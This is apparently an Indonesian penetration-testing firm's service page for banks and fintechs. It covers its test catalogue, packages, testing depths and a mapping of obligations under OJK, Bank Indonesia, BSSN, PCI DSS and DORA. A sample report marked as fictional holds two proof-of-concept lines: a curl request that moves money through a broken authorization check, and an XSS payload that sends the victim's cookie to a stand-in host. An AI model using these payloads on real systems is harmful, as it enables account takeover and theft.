Jenis pengujianVA+PTMetodologi / standarVendor + kustomRegulasi / konteksPCI DSS · OJK POJK 11Infrastruktur & sistem khusus · Penetration test
Mainframe Security Test (z/OS, RACF/ACF2/Top Secret)
Konfigurasi dan kontrol akses mainframe legacy.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarDISA STIGs, kustomRegulasi / konteksOJK POJK 11Infrastruktur & sistem khusus · Penetration test
IBM i (AS/400) Security Test
Sistem mid-range legacy: autentikasi, keamanan library, dan exit program.
VA+Advisory
Jenis pengujianVA+AdvisoryMetodologi / standarKustomRegulasi / konteksOJK POJK 11Regulasi & tata kelola · Advisory
Asesmen maturitas keamanan siber OJK POJK 11
Kepatuhan pada ketentuan risiko dan ketahanan siber dalam POJK 11/POJK.03/2022.
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarOJK POJK 11Regulasi / konteksOJK POJK 11Regulasi & tata kelola · Advisory
Asesmen kepatuhan BSSN untuk infrastruktur kritis (IIV)
Pemetaan kepatuhan untuk Penyelenggara Infrastruktur Informasi Vital (IIV) yang sudah ditetapkan.
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarPanduan BSSN, UU PDPRegulasi / konteksBSSN · UU PDPRegulasi & tata kelola · Advisory
ISO 27001 + 27032 Cybersecurity Gap Assessment
Analisis gap dan roadmap khusus keamanan siber.
Advisory
Jenis pengujianAdvisoryMetodologi / standarISO 27001/27032Regulasi / konteksISO 27001/27032Regulasi & tata kelola · Advisory
Asesmen maturitas NIST CSF
Baseline maturitas dan roadmap berbasis CSF 2.0.
Advisory
Jenis pengujianAdvisoryMetodologi / standarNIST CSF 2.0Regulasi / konteksInternalRegulasi & tata kelola · Advisory
Operational Risk & ICAAP Cyber Input Testing
Input risiko operasional khusus siber untuk skenario ICAAP.
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarBasel, ICAAPRegulasi / konteksKerangka Basel OJKRegulasi & tata kelola · Penetration test
Third-Party / Vendor Penetration Test
Validasi keamanan core banking berbasis cloud dan infrastruktur SaaS fintech.
PT+Advisory
Jenis pengujianPT+AdvisoryMetodologi / standarKustom + OJKRegulasi / konteksOJK POJK 11Regulasi & tata kelola · Advisory
DORA Readiness Assessment (untuk bank di Indonesia dengan eksposur ke Uni Eropa)
Kesiapan menghadapi Digital Operational Resilience Act (DORA) untuk operasional lintas negara.
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarDORA Uni EropaRegulasi / konteksDORA Uni EropaTeknologi baru · Advisory
Post-Quantum Cryptography Readiness for Banks
Inventaris kriptografi di PKI, HSM, dan sistem pembayaran; roadmap migrasi PQC.
Advisory+VA
Jenis pengujianAdvisory+VAMetodologi / standarNIST FIPS 203/204/205, X9.143, panduan PCI yang sedang berkembangRegulasi / konteksPersiapan jangka panjangTeknologi baru · Penetration test
AI/ML Model Security in Credit Scoring & Fraud
Adversarial ML, model extraction, dan uji fairness/robustness.
PT+VA
Jenis pengujianPT+VAMetodologi / standarOWASP LLM Top 10, NIST AI RMF, MITRE ATLASRegulasi / konteksOJK + aturan AI yang sedang berkembangTeknologi baru · Penetration test
LLM Banking Assistant / Agent Security Test
Prompt injection di alur agent yang terhubung ke transaksi, serta RAG poisoning.
PT
Jenis pengujianPTMetodologi / standarOWASP LLM Top 10, MITRE ATLASRegulasi / konteksOJK + aturan AI yang sedang berkembangTeknologi baru · Advisory
Quantum-Safe SWIFT & Payment Infrastructure Planning
Roadmap migrasi kriptografi pembayaran, key ceremony, dan signing.
Advisory
Jenis pengujianAdvisoryMetodologi / standarX9.143, panduan PCI yang sedang berkembang, NISTRegulasi / konteksPersiapan jangka panjangSudah menemukan yang Anda cari?
Dari layanan yang Anda pilih ke ruang lingkup yang jelas
Kirimkan target dan hasil yang Anda harapkan. Kami balas dengan usulan attack surface, kedalaman, metode, dan timeline. Jawaban dari engineer, bukan pitch deck.
Mulai dari sini
Paket pengujian
Tak ingin menyusun pengujian sendiri dari katalog? Banyak tim memulai dari paket-paket ini. Setiap paket dirancang untuk momen tertentu, dengan satu SOW dan satu timeline.
Fondasi maturitas siber bank
8–12 mingguBank tier-2/3
Bank yang butuh kesiapan dasar POJK 11 dan peningkatan maturitas yang siap dipaparkan ke Direksi.
Termasuk
- Pentest eksternal + internal
- VAPT web + mobile banking
- Simulasi phishing
- Analisis gap OJK POJK 11
- Asesmen Active Directory
Termasuk laporan kenaikan skor maturitas siber (CSM), siap dipaparkan ke Direksi.
Persiapan peluncuran fintech
4–6 mingguFintech / bank digital / P2P
Fintech yang akan meluncur dan butuh persetujuan OJK/BI serta bukti yang siap diaudit.
Termasuk
- Pentest web + API + mobile
- Asesmen konfigurasi cloud
- Simulasi phishing
- Threat model
Satu SOW, satu timeline. Cocok untuk perusahaan product-led.
Onboarding sistem pembayaran
5–8 mingguBank / PJP yang akan terhubung ke sistem pembayaran BI
Perusahaan yang sedang onboarding BI-FAST atau SNAP dengan tenggat regulator yang ketat.
Termasuk
- VAPT API BI-FAST atau SNAP
- Pentest aplikasi mobile
- Review OAuth / FAPI
- Review HSM
Dirancang khusus untuk pasar Indonesia.
SWIFT tahunan + threat-led
8–12 mingguBank yang terhubung ke SWIFT
Bank yang menjalani siklus tahunan CSP dan ingin validasi nyata, bukan sekadar atestasi.
Termasuk
- Asesmen SWIFT CSP CSCF
- Audit SAA / SAG
- Assumed breach terhadap zona SWIFT
- Tabletop exercise
Validasi lebih dari sekadar atestasi CSP. Hasilnya siap dipaparkan ke Direksi.
Ketahanan terhadap ransomware
6–10 mingguBank / infrastruktur kritis
Direksi yang menuntut kesiapan menghadapi ransomware setelah terjadi insiden di industrinya.
Termasuk
- Asesmen kesiapan menghadapi ransomware
- Tabletop exercise
- Validasi backup / pemulihan
- Review tiering AD
Fokus pada pemulihan, bukan hanya pertahanan.
Peluncuran AI yang aman
4–6 mingguPerusahaan yang menerapkan LLM / agentic AI
Tim yang meluncurkan agentic AI atau AI untuk melayani pelanggan langsung, di sektor yang diatur regulator.
Termasuk
- Pentest aplikasi LLM
- Keamanan model AI/ML
- Threat model
- Peta cakupan OWASP LLM
Spesialisasi keamanan AI untuk pasar Indonesia.
Fondasi OT / infrastruktur kritis
6–10 mingguPenyelenggara IIV yang ditetapkan BSSN
Operator infrastruktur kritis yang butuh baseline teknis awal.
Termasuk
- Asesmen OT / ICS
- Uji segmentasi jaringan
- Asesmen AD
- Simulasi phishing
- Review arsitektur
Spesialisasi infrastruktur kritis nasional.
Langganan CTEM
TahunanProgram keamanan yang sudah matang
Perusahaan yang beralih dari VAPT tahunan ke validasi berkelanjutan tanpa jeda.
Termasuk
- External Attack Surface Management
- Breach & Attack Simulation
- Rotasi pentest setiap kuartal
- Validasi detection engineering
- Laporan kuartalan untuk Direksi
Validasi tanpa jeda, bukan potret sesaat.
Pilihan 2 · Seberapa jauh kami menguji
Tingkat kedalaman pengujian, bukan produk terpisah
Red team bukan layanan lain di luar VAPT. Red team adalah tingkat terdalam dari disiplin yang sama.
Vulnerability assessment
Menemukan dan memprioritaskan celah keamanan yang sudah diketahui di seluruh attack surface. Fokusnya: cakupan seluas-luasnya.
VAPenetration test
Mengeksploitasi celah itu seperti penyerang sungguhan, dengan model black, grey, atau white box. Dampaknya dibuktikan, bukan sekadar ditemukan.
PTRed team
Operasi senyap dan full-scope untuk mencapai sasaran yang sudah ditetapkan. Manusia, proses, dan teknologi diuji sekaligus.
Full-scopePurple team
Red team dan blue team di ruangan yang sama. Setiap serangan dipakai untuk memperkuat detection engineering.
Red + BlueValidasi berkelanjutan
BAS dan CTEM. Bukan lagi pengujian setahun sekali: setiap TTP divalidasi tiap minggu.
Selalu aktifDi dalam penetration test · model “box”
“Box” hanya menunjukkan seberapa banyak informasi yang kami terima sebelum mulai. Ini pilihan di dalam pentest, bukan layanan terpisah.
Black box
Tanpa informasi awal. Kami mulai dari titik yang sama dengan penyerang sungguhan dari luar.
Grey box
Sebagian informasi atau akun dengan hak akses rendah: skenario assumed breach, saat penyerang sudah ada di dalam.
White box
Akses penuh ke source code, arsitektur, dan kredensial. Kedalaman maksimal untuk setiap manday.
Pilihan 3 · Skema pengadaan
Tiga model kerja sama
Proyek fixed scope
Satu target, satu SOW (statement of work), satu laporan. Pentest klasik.
Cocok untuk kepatuhan tahunan & potret kondisi keamanan saat pengujian
Paket manday
Kuota manday tenaga ahli dengan tarif yang dikunci di awal, bisa Anda pakai untuk berbagai pengujian sepanjang tahun.
Cocok untuk program dengan kebutuhan pengujian yang rutin dan beragam
Langganan berkelanjutan
CTEM / BAS: validasi yang berjalan terus, dengan rotasi per kuartal dan detection engineering.
Cocok untuk SOC yang sudah matang dan ingin lebih dari sekadar pengujian tahunan
Pemetaan regulasi
Ketentuan regulator Anda dan pengujian keamanan siber yang menjawabnya
Institusi yang diawasi regulator datang membawa kewajiban, bukan daftar belanja. Berikut pemetaan kewajiban itu ke layanan Zentara.
Indonesia
OJK
POJK 11/2022: Penyelenggaraan TI oleh Bank Umum
Tahunan + sewaktu-waktu
Kerangka risiko dan ketahanan siber, manajemen risiko TI (ITRM), pengelolaan pihak penyedia jasa TI, serta penanganan insiden siber.
Pentest eksternal/internal, VAPT web/mobile, asesmen maturitas POJK 11, uji ketahanan siber
OJK
POJK 10/2022: LPBBTI (P2P lending)
Tahunan
Standar sistem TI, pelindungan data, dan pengendalian untuk penyelenggara P2P lending.
VAPT platform P2P, pentest web/API, uji e-KYC
Bank Indonesia
QRIS · BI-FAST · SNAP
Saat onboarding + berkala
Keamanan peserta sistem pembayaran, integritas setelmen, dan open API yang terstandar.
VAPT API QRIS / BI-FAST / SNAP, review OAuth/FAPI, pentest aplikasi mobile
BSSN
Infrastruktur Informasi Vital (IIV)
Berkelanjutan
Persyaratan keamanan siber yang lebih ketat untuk Penyelenggara IIV yang ditetapkan.
Asesmen OT/ICS, validasi segmentasi, review arsitektur
UU PDP
Undang-Undang Pelindungan Data Pribadi
Berkelanjutan
Kewajiban Pengendali dan Prosesor Data Pribadi, termasuk pemberitahuan kegagalan Pelindungan Data Pribadi.
DPIA (penilaian dampak Pelindungan Data Pribadi) + pengujian teknis, asesmen eksposur data
Regional
MAS
TRM Guidelines (Singapura)
Tahunan
Manajemen risiko teknologi: pentest dan threat-led testing untuk lembaga keuangan yang berdampak sistemik.
Pentest, simulasi serangan adversarial (ART), red team
Global
PCI SSC
PCI DSS v4.0.1: Persyaratan 11.4
Tahunan + uji segmentasi tiap 6 bulan (khusus service provider)
Wajib menguji cardholder data environment (CDE) setiap tahun.
Pentest PCI 11.4 internal/eksternal/segmentasi/aplikasi, review HSM
SWIFT
Customer Security Programme (CSP)
Tahunan
Atestasi tahunan terhadap CSCF; community-standard assessment.
Asesmen SWIFT CSP CSCF, pentest lingkungan SWIFT, assumed breach
Uni Eropa
DORA: Digital Operational Resilience
Berkelanjutan
Risiko TIK, risiko pihak ketiga, dan threat-led testing untuk entitas yang ditetapkan.
TLPT (selaras TIBER-EU), pentest pihak ketiga, uji ketahanan
ISO / IEC
27001:2022 (+27017 / 27018)
Siklus 3 tahun
Kerangka SMKI (ISMS) dengan bukti teknis keamanan siber dan keamanan cloud.
Bukti pengujian teknis, audit konfigurasi, gap assessment
Yang Anda terima
Laporan yang bisa ditindaklanjuti Direksi dan engineer Anda
Setiap proyek menghasilkan laporan dua lapis: narasi risiko untuk eksekutif dan rincian teknis per temuan, lengkap dengan skor CVSS v3.1, PoC, dan langkah remediasi. Laporan dikirim dalam format DOCX + PDF, ditambah laporan retest (uji ulang) sebagai bukti bahwa temuan sudah tertutup. Contoh di bawah memakai data fiktif, bukan data klien.
Lapis 1 · Ringkasan eksekutif
Gambaran singkat profil risiko
68
/100
Skor ketahanan
Eksposur sedang. Dua temuan kritis harus ditangani sebelum rilis berikutnya.
23 temuan · CVSS v3.1
Pemetaan kepatuhan: ISO 27001 · NIST CSF · BSSN · PCI DSS 11.4, bisa ditelusuri per temuan.
Lapis 2 · Temuan teknis
Broken Object-Level Authorization (BOLA) di API transfer
Critical · 9.1Aset terdampak
POST /api/v2/accounts/{id}/transfer
Bukti eksploitasi (PoC)
$ curl -H "Authorization: Bearer <userA>" \
-X POST /api/v2/accounts/80421/transfer \
-d '{"to":"attacker","amount":50000}'
→ 200 OK { "status": "settled" } # akun 80421 milik userBDampak bisnis
Pengguna terautentikasi dengan hak akses rendah bisa mengenumerasi ID akun dan memulai transfer dari akun milik orang lain. Akibatnya: kerugian finansial langsung dan insiden yang wajib dilaporkan ke regulator.
Remediasi
Terapkan pengecekan kepemilikan di sisi server untuk setiap referensi objek. Ikat akun ke principal yang sudah terautentikasi, bukan ke request body.
Reflected XSS di parameter pencarian
High · 7.4Aset terdampak
GET /search?q=
Bukti eksploitasi (PoC)
GET /search?q=<svg/onload=fetch('//x.tld/'+document.cookie)>
→ payload muncul kembali tanpa escaping di response bodyDampak bisnis
Penyerang bisa membuat tautan yang menjalankan script di sesi korban yang sudah login, sehingga token sesi bisa dicuri dan akun diambil alih.
Remediasi
Terapkan output encoding yang sesuai konteks pada semua input yang ditampilkan kembali. Pasang Content-Security-Policy yang ketat sebagai lapisan pertahanan tambahan (defense in depth).
Konfigurasi TLS lemah di gateway eksternal
Medium · 5.3Aset terdampak
gateway.example-bank.co:443
Bukti eksploitasi (PoC)
$ testssl gateway.example-bank.co → TLS 1.0 masih ditawarkan (deprecated) · cipher 3DES diterima
Dampak bisnis
Cipher suite lama serta TLS 1.0/1.1 masih aktif. Ini melemahkan keamanan transport dan tidak memenuhi persyaratan PCI DSS v4.0.1.
Remediasi
Nonaktifkan TLS ≤1.1 dan suite CBC/3DES. Wajibkan TLS 1.2+ dengan cipher AEAD modern dan HSTS.
Ada tenggat kepatuhan atau permintaan Direksi?
Ruang lingkup berbasis regulasi dalam hitungan hari, bukan minggu
Sebutkan regulasi yang berlaku untuk Anda. Kami petakan ke pengujian yang tepat, lalu kirimkan ruang lingkup yang siap Anda bawa ke auditor dan Direksi.
Pembahasan mendalam
Layanan unggulan
Layanan yang kami bahas lebih rinci di halaman tersendiri.

Standar kerja kami
Tim bersertifikat. Setiap temuan divalidasi manual.
Setiap temuan divalidasi manual dan direproduksi oleh tim bersertifikat sebelum masuk ke laporan Anda. Tool otomatis yang menemukan, manusia yang memastikan.
Dikerjakan oleh tim bersertifikat
FAQ
Pertanyaan yang sering diajukan
Jawaban lugas. Kalau pertanyaan Anda belum ada di sini, tanyakan langsung ke kami.
Ketiganya bukan produk terpisah, tapi tingkat kedalaman pengujian yang berbeda dalam satu disiplin. Vulnerability assessment menemukan celah keamanan. Penetration test mengeksploitasi celah itu untuk membuktikan dampaknya. Red team menjalankan operasi senyap dan full-scope untuk mencapai sasaran yang sudah ditetapkan, dengan menguji manusia, proses, dan teknologi sekaligus. VAPT (vulnerability assessment & penetration testing) adalah gabungan VA dan pentest, dan menjadi fondasi untuk semua tingkat berikutnya.
Ketiganya menunjukkan seberapa banyak informasi yang kami terima sebelum mulai. Black box berarti tanpa informasi awal: kami mulai dari titik yang sama dengan penyerang dari luar. Grey box memberi kami sebagian informasi atau akun dengan hak akses rendah, sesuai skenario assumed breach. White box memberi kami akses penuh ke source code dan arsitektur untuk kedalaman maksimal. Ini pilihan di dalam penetration test, bukan layanan yang berbeda.
Alih-alih menentukan ruang lingkup dan harga untuk setiap pengujian, Anda membeli kuota manday tenaga ahli dengan tarif yang dikunci di awal. Kuota itu bisa dipakai sepanjang tahun untuk apa pun yang perlu diuji: rilis baru, akuisisi, atau permintaan regulator. Model ini cocok untuk organisasi dengan kebutuhan pengujian yang rutin dan beragam. Proses pengadaan pun tak lagi menghambat setiap proyek.
Ada. Perbankan & jasa keuangan adalah sektor yang paling kami dalami. Kami punya cakupan khusus untuk core banking, switching pembayaran, SWIFT CSP, sistem pembayaran Indonesia (QRIS, BI-FAST, SNAP), dan keamanan kanal layanan. Industri tidak mengubah tiga pilihan tadi, hanya menentukan titik awalnya: attack surface, kedalaman, dan pemetaan regulasi yang relevan untuk sektor Anda.
Setiap proyek dikerjakan oleh tim bersertifikat (OSCP, OSEP, OSWE, OSMR, CRTO, GXPN, dan lainnya), yang dipilih sesuai attack surface yang diuji. Sertifikasi tim untuk setiap proyek dicantumkan di SOW (statement of work).
PTES, OWASP (WSTG, API, MASVS, LLM Top 10), NIST SP 800-115, MITRE ATT&CK, serta CVSS v3.1 untuk menilai tingkat keparahan temuan. Semuanya dipetakan ke regulasi yang berlaku untuk Anda, termasuk OJK (POJK 11), BSSN, PCI DSS v4.0.1, dan SWIFT CSCF.
Tentukan ruang lingkup pengujian offensive security
Ceritakan apa yang perlu Anda lindungi dan seberapa jauh Anda ingin kami menguji. Kami balas dengan usulan attack surface, kedalaman, metode, dan timeline pengujian.